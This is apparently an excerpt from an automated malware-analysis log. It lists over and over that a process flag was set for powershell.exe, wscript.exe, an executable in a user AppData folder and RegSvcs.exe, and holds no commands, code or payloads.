Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
